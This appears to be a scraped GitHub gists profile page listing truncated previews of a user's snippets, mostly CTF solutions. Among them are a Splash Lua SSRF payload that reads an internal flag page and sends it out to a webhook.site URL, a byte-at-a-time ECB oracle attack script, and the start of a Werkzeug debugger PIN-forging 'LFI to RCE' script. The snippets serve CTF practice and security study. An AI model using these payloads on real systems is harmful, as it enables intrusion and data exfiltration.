Skip to content

Instantly share code, notes, and snippets.

View u0pattern's full-sized avatar
🐴
horseback riding.....

Mohammed u0pattern

🐴
horseback riding.....
468 followers · 19 following
View GitHub Profile
@u0pattern
u0pattern / keybase.md
Created February 9, 2022 09:48

Keybase proof

I hereby claim:

  • I am u0pattern on github.
  • I am u0pattern (https://keybase.io/u0pattern) on keybase.
  • I have a public key ASAWBhITZG9ljyAr3c3o0UZ332als5XXEZ0xrgC3FgFl2Qo

To claim this, I am signing this object:

@u0pattern
u0pattern / interview-solve.py
Last active February 6, 2022 22:48
My solution for bypassing the NX & solving the "interview-opportunity" pwn challenge in DiceCTF
#!/usr/bin/python3
from pwn import *
REMOTE = True
if REMOTE:
p = remote("mc.ax", 31081)
else:
p = process('./interview-opportunity')
@u0pattern
u0pattern / ldd.py
Last active February 23, 2023 15:00
Linux's ldd-like implementation in Python
try:
from elftools.elf.elffile import ELFFile
except:
print("You need to install elftools library: pip3 install pyelftools")
exit()
ELF_FILE = "" # put the elf file that you want here
with open(ELF_FILE, 'rb') as f:
elffile = ELFFile(f)
@u0pattern
u0pattern / solve.py
Created May 3, 2021 05:49
[DEFCON CTF quals] - "qoo-or-ooo" chall solution
from binascii import unhexlify
from Crypto.Cipher import AES
import hashlib
from itertools import product
def key_array_to_key_string(key_list):
key_string_binary = b''.join([bytes([x]) for x in key_list])
return hashlib.md5(key_string_binary).digest()
def pattern(order):
@u0pattern
u0pattern / Sploosh.py
Created December 7, 2020 03:11
import requests
from urllib import quote
lua="""
function main(splash)
local treat = require("treat")
local json = splash:http_get('http://172.16.0.14/flag.php')
local response=splash:http_get('https://webhook.site/41ccba09-fd57-439b-b8be-05e20e446b72?flag='.. treat.as_string(json.body))
return "hi"
end
@u0pattern
u0pattern / chByYxs.php
Created October 24, 2020 22:53
<?php echo '<html><body><form method="post" action="">Password: <input type="password" name="p"> <input type="submit"></form></body></html>' ?>
<?php if($_POST['p']){if($_POST['p']==='p4ssw0rd'){ echo '<font color="green">Logged in</font>' ?>
<?php }else{ echo '<font color="red">Failed</font>' ?>
<?php }} ?>
@u0pattern
u0pattern / solveECB.py
Created May 2, 2020 13:46
import base64,requests,binascii,string
flag = 'flag'
for i in range(len(flag), 16):
salt = 'x' * (16 - 1 - i)
known = binascii.hexlify(base64.b64decode(requests.get('https://obscure-river-88658.herokuapp.com/?sugar='+salt).text))
for c in string.printable:
unknown = binascii.hexlify(base64.b64decode(requests.get('https://obscure-river-88658.herokuapp.com/?sugar='+(salt+flag+c)).text))
if known[:16] == unknown[:16]:
flag += c
print(flag)
@u0pattern
u0pattern / TTS.html
Created April 3, 2020 18:22
<html>
<head>
<script src='https://code.responsivevoice.org/responsivevoice.js?key=WGciAW2s'></script>
</head>
<body>
<input onclick="responsiveVoice.speak('أهلا وسهلا','Arabic Male');" type="button" value="Play" />
</body>
</html>
@u0pattern
u0pattern / noCSRFandCORS.php
Created January 10, 2020 17:04
<?php
# 1337r00t\.me >> u can change it to ur own host (or u can use parse_url($_SERVER['HTTP_REFERER'],PHP_URL_HOST) function instead of regex)
if(!isset($_SERVER['HTTP_REFERER']) || !preg_match('/^(?:http(?:s)?:\/\/)?(?:[^\.]+\.)?1337r00t\.me\/(.*)/',$_SERVER['HTTP_REFERER'])){
exit('<script>window.location.replace("'.htmlspecialchars("https://1337r00t.me/".substr($_SERVER['REQUEST_URI'],1)).'");</script>');
}
?>
@u0pattern
u0pattern / LFI2RCEonWerkzeug.py
Created January 2, 2020 11:42
now you can got RCE from LFI without needing to know the value of the environment variables .
import hashlib
public_bits = [
'testUser',# username /etc/passwd
'flask.app',
'Flask',
'/usr/local/lib/python3.5/dist-packages/flask/app.py'
]
private_bits = [